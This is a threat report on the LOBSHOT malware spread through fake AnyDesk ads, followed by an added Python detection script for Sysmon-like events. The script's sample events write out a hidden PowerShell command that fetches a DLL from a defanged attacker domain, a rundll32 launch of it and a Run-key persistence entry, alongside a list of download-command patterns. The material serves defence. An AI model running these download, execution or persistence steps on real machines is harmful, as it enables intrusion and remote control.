Cybersecurity researchers have discovered a new malware strain, called 'LOBSHOT', that is distributed through Google ads.
What is LOBSHOT Malware?
The ads, which promoted the legitimate AnyDesk remote management software, led users to a fake AnyDesk site at amydeecke[.]website. This site pushed a malicious MSI file that executed a PowerShell command to download a DLL from download-cdn[.]com, a domain previously associated with the TA505/Clop ransomware gang. However, it is unclear whether TA505 still controls the domain, as its ownership has changed in the past.
The downloaded DLL is the LOBSHOT payload itself; it is saved under C:\ProgramData and executed with rundll32.exe.
Once running, LOBSHOT checks whether Microsoft Defender is present and, if it is, terminates to avoid detection; a Defender-protected analysis machine will therefore see no further activity from the sample. If Defender is absent, the malware creates Registry entries so that it starts automatically at user logon, and then transmits system information from the infected host, including the list of running processes, to its command-and-control server.
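The delivery chain above (MSI spawning a PowerShell downloader, rundll32.exe loading a DLL from C:\ProgramData, and a Run-key entry pointing back at that DLL) is easy to express as endpoint-telemetry rules. The following is an added example written for this page, not code from the original article or from any vendor report. It assumes a flattened, Sysmon-like event schema (Event ID 1 for process creation, Event ID 13 for registry value set) with the field names shown; the sample events, file name x.dll and the Run-key value name Updater are constructed for illustration.

```python
"""Detection rules for the LOBSHOT delivery chain over Sysmon-like events.

Added example; the event records and field names below are constructed
(assumption: a flattened Sysmon schema). Real collectors will use different
field names and the rules would be ported to the SIEM's query language.
"""
import re

# Constructed sample telemetry: the malicious chain plus two benign events
# that must NOT trigger (rundll32 loading a system DLL, a vendor Run key).
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"msiexec.exe /i C:\Users\u\Downloads\AnyDesk.msi"},
    {"event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     # Domain kept defanged exactly as the article prints it.
     "command_line": 'powershell.exe -w hidden -c "iwr http://download-cdn[.]com/x.dll '
                     '-OutFile C:\\ProgramData\\x.dll"'},
    {"event_id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"rundll32.exe C:\ProgramData\x.dll,DllMain"},
    {"event_id": 13, "image": r"C:\Windows\System32\rundll32.exe",
     "target_object": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
                      r"\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"rundll32.exe C:\ProgramData\x.dll,DllMain"},
    {"event_id": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"event_id": 13, "image": r"C:\Windows\System32\msiexec.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "details": r"C:\Program Files\Vendor\tray.exe"},
]

# A DLL path under C:\ProgramData (case-insensitive, literal backslashes).
PROGRAMDATA = re.compile(r"(?i)c:\\programdata\\")
# Common PowerShell download primitives seen in MSI-dropped loaders.
DOWNLOAD_CMDLET = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget)\b")
# HKLM/HKCU/HKU ...\CurrentVersion\Run or RunOnce autostart keys.
RUN_KEY = re.compile(r"(?i)\\software\\microsoft\\windows\\currentversion\\run(once)?\\")


def basename(path: str) -> str:
    """Return the lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule_name, evidence) tuples for every event matching a rule."""
    hits = []
    for ev in events:
        if ev["event_id"] == 1:  # process creation
            img = basename(ev["image"])
            parent = basename(ev.get("parent_image", ""))
            cmd = ev.get("command_line", "")
            # Stage 1: the installer itself launches a PowerShell downloader.
            if parent == "msiexec.exe" and img == "powershell.exe" \
                    and DOWNLOAD_CMDLET.search(cmd):
                hits.append(("msi_spawns_powershell_download", cmd))
            # Stage 2: rundll32 executing a DLL dropped into C:\ProgramData.
            if img == "rundll32.exe" and PROGRAMDATA.search(cmd):
                hits.append(("rundll32_loads_programdata_dll", cmd))
        elif ev["event_id"] == 13:  # registry value set
            target, details = ev["target_object"], ev["details"]
            # Stage 3: autostart entry pointing at ProgramData or at rundll32.
            if RUN_KEY.search(target) and (
                    PROGRAMDATA.search(details) or "rundll32" in details.lower()):
                hits.append(("run_key_persistence_programdata", target))
    return hits


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

Each rule fires on its own, so a host where the chain was interrupted (for instance because the Defender check made the payload exit) still surfaces the MSI-to-PowerShell download and the dropped DLL even when no persistence key was ever written.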
LOBSHOT includes an hVNC (hidden VNC) module that opens a second, hidden desktop on the victim machine, invisible to the logged-in user. The threat actors control that desktop with their own mouse and keyboard as if they were sitting in front of it. With this kind of access, the threat actors have complete control over the device, allowing them to execute commands, steal data, and deploy further malware payloads.
| Indicator | Type | Context |
|---|---|---|
| 18.104.22.168 | IP address | LOBSHOT C2 |